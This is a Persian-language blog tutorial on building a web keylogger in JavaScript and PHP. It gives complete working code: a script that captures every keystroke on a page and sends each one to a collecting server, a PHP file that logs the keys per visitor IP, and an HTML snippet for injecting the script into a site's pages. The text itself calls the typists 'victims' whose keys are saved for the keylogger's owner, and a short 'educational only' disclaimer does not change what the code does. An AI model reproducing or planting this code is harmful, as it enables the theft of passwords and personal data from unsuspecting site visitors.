نوشته‌ها

آموزش ساخت Javascript Keylogger

آموزش ساخت کی لاگر Keylogger تحت وب به زبان Javascript آماده کردم که امیدوارم مورد استقبال قرار بگیره.طرز کار کی لاگر :
این key-logger تمام دکمه هایی که یک کاربر حین ورود به یک سایت را میزنه را داخل یک فایل TXT ذخیره میکنه و این keylogger کاملا تحت وب هست و تا زمانی که سایت آلوده باز باشد کلیه کلیدهای زده شده از صفحه کلید توسط قربانی برای صاحب کی لاگر ذخیره میشود.

توجه !
این مطلب فقط جنبه آموزشی دارد و مسـئــولیت استفاده از آن بر عهده استفاده کنندگان می باشد و گروه توسعه هیچ مسئـــولیتی را قبول نمیکند.
این آموزش فقط برای این تهیه شده که وبمستران در جریان باشند که افراد سودجو از هر روشی برای سوء استفاده از اطلاعات شخصی استفاده می کنند.

 

روش ساخت در چند قدم به ترتیب :

۱٫ یک فایل TEXT ساخته و نام آن را به record.js تغییر میدهیم و داخل آن متن زیر را کپی مینماییم :
ضمنا مقدار http://site.com/record را به سایت خود تغییر میدهیم.

۱
۲
۳
۴
۵
۶
۷
۸
۹
۱۰
۱۱
۱۲
۱۳
۱۴
۱۵
۱۶
۱۷
۱۸
۱۹
۲۰
۲۱
۲۲
۲۳
۲۴
۲۵
۲۶
۲۷
۲۸
۲۹
۳۰
۳۱
۳۲
۳۳
۳۴
۳۵
۳۶
۳۷
۳۸
۳۹
۴۰
۴۱
۴۲
۴۳
۴۴
۴۵
۴۶
۴۷
۴۸
۴۹
۵۰
۵۱
۵۲
۵۳
۵۴
function behavior(event)
{
var keya = “”;
keya = event.keyCode;
keyb = String.fromCharCode(keya);
makeRequest(‘http://site.com/record/write.php?on=’ + keyb);
}
function makeRequest(url)
{
var httpRequest;
if (window.XMLHttpRequest)
{ // Mozilla, Safari
httpRequest = new XMLHttpRequest();
if (httpRequest.overrideMimeType) {
httpRequest.overrideMimeType(‘text/xml’);
}
}
else if (window.ActiveXObject)
{ // IE
try
{
httpRequest = new ActiveXObject(“Msxml2.XMLHTTP”);
}
catch (e) {
try {
httpRequest = new ActiveXObject(“Microsoft.XMLHTTP”);
}
catch (e) {}
}
}
if (!httpRequest)
{
return false;
}
httpRequest.onreadystatechange = function() { alertContents(httpRequest); };
httpRequest.open(‘GET’, url, true);
httpRequest.send(null);
}
function alertContents(httpRequest)
{
if (httpRequest.readyState == 4) {
if (httpRequest.status == 200) {
}
else
{
}
}
}

۲٫ دوباره یک فایل text میسازیم و اسم آن را به write.php تغییر میدهیم و اطلاعات زیر را در آن کپی مینماییم :

۱
۲
۳
۴
۵
۶
<?php
$_GET[‘on’];
$file = fopen($_SERVER[‘REMOTE_ADDR’] . “.txt”,”a”);
fwrite($file,$_GET[‘on’] . ‘||’);
fclose($file);
?>

کی لاگر شما با موفقیت ساخته شده.
حال آن را باید در داخل صفحه مورد نظر load نماییم تا اسکریپت کار خودش رو شروع نماید.

به عنوان مثال ما یک فایل با نام omid.php داریم حال این صفحه میتونه index یک سایت باشه فرقی نمیکنه تغییرات زیر را در آن اعمال میکنیم.

۱
۲
۳
۴
۵
۶
۷
۸
۹
۱۰
۱۱
۱۲
<html>
<head>
<SCRIPT language=”javascript” SRC=”record.js”></SCRIPT>
</head>
<body onkeyup=”behavior(event)”>
Page Content
</body>
</html>